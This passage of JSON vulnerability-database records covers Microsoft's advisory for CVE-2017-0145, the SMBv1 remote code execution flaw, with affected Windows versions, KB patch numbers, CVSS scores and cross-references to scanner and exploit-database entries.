installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:55:04", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T22:48:26", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4014077", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:26", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-18T00:49:58", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4014077", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": 
"KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 
2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 